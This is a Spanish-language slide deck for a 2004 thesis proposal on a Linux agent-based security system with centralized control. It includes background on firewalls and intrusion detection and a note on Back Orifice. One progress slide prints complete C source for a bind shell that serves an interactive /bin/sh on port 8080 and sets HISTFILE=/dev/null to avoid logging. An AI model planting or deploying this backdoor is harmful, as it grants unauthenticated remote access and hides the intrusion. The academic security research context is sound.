Centro de Investigación y de Estudios Avanzad del IPN.

Departamento de Ingeniería Eléctrica.

Sección de Computación

  Sistema Distribuido de Agentes con Control Centralizado de seguridad.

Tesista: Mario Irán Florentino Parra Hernández.

Director de tesis: Dr. Jorge Buenabad Chávez.

09 / Nov. / 2004

Antecedentes. Limitantes.Objetivos.MetodologiaConograma.Productos esperados.Avances.Referencias.

Agenda.

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Antecedentes.

En los últimos años Internet a permitido nuevas formas de comunicación entre sistemas computacionales.Por lo que se han creado mecanismos de seguridad que tratan de prevenir accesos sin autorización como son:

Protección perimetral (firewalls). Sistemas de Detección de Intrusos ( SDIs). Antivirus. VPN.

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Antecedentes ( Cont.)

El crecimiento del Internet implica riesgos de seguridad en los sistemas computacionales por eventos maliciosos como son:

Personas no autorizadas que acceden desde Internet.

Virus Informático se encuentran en constante acoso a sistemas desde Internet.

Usuarios autorizados que intentan tener privilegios adicionales.

Usuarios abusan de los privilegios otorgados

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Limitantes.

Las limitantes que presentan los sistemas de seguridad es su Confiabilidad.

Trabajan con reglas de seguridad que con el tiempo tienden hacer obsoletas.

Objetivos

Objetivo General.

Desarrollar un sistema distribuido de agentes con control centralizado que administre la seguridad en sistemas distribuidos en plataforma LINUX.

 Objetivo Particular.

Implementar agentes en sistemas red en plataforma LINUX que administren la seguridad en cada estación de trabajo. Implementación de una interfaz grafica que administre a los agentes mediante protocolos de comunicación y autentificación.

Esquematización.

InternetInternetRed interna

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

CONTROL CENTRALIZAD

O

Metodologia.

Etapa 1 Análisis y selección. Agentes. Obtención de privilegio de en Linux. Protocolos de Comunicación y Autentificación. GTK.

Etapa 2 Diseño

Etapa 3 Implementación.

Etapa 4 Pruebas.

Etapa 5 Documentación de la tesis.

Cronograma

Etapa 1 2 3 4 5 6 7 8 9 10 11

 Análisis y Selección.

( Desarrollo de Protocolo)

   

                   

 Diseño.

 

                     

 Implementación.

 

                     

 Pruebas.

 

                     

 Documentación.

 

                     

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Productos esperados.

Desarrollo de Agentes sobre Linux.

Desarrollo del Control Centralizado administrador de los agentes.

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Avance

Back Orifice.

Es una pequeña utilidad para el control remoto de equipos.

Se compone basicamente de dos elementos: el cliente y el servidor.

Controlar remotamente estaciones Windows.

Desarrollado por un grupo de Hacker que se hacen llamar Cult of the Dead Cow.

Se distribuyen como si fuera un virus por lo que no es muy confiable.

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Trabajo Relacionado.

Avance (Cont.)

Back Orifice.

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Avace (Cont).

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

#include <stdio.h> #include <unistd.h> #include <stdlib.h>#include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <netinet/in.h> #include <signal.h> #include <string.h>

#define DEFAULT_PORT 8080

int main(int argc,char **argv) { char *name[3];char *env[2]; int fd,fd2,fromlen; int port; struct sockaddr_in serv; unsigned char *ptr;

port=DEFAULT_PORT; signal(SIGCHLD,sig_hand); if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { exit(1); } serv.sin_addr.s_addr=0; serv.sin_port=htons(port); serv.sin_family=AF_INET; if(bind(fd,(struct sockaddr *)&serv,16)) { exit(1); } if(listen(fd,5)) { exit(1); } for(;;) { fromlen=sizeof(struct sockaddr); fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); if (fd2<0) continue; if (fork()) { close(fd2); } else { close(fd); /* Se redirecciona la entrada y salida*/dup2(fd2,0); dup2(fd2,1); dup2(fd2,2); name[0]="/bin/sh"; name[1]="-i"; name[2]=NULL; env[0]="HISTFILE=/dev/null"; env[1]=NULL; execve(name[0],name,env); exit(1); } } }

UNIX Network Programming

Avance (Cont).

Herramienta para el desarrollo de software basado en agentes tanto de carácter  comercial como académico. 

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

AgentBuilder

http://www.agentbuilder.com/

Referencias

UNIX Network Programming, Volume 1, Second Edition: Networking APIs: Sockets and XTI, Prentice Hall, 1998.

Richard Stevens.

UNIX Network Programming, Volume 2, Second Edition: Interprocess Communications, Prentice Hall, 1999.

Richard Stevens.

Allen Julie, et al, “State of the Practice of Intrusion Detection Technologies”, Carnegie Mellon Software Enginneering Institute, January 2000.

Caswell Brian, Roesh Marty, Snort The Open Source Network Intrusion Detection System, 2004.

Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004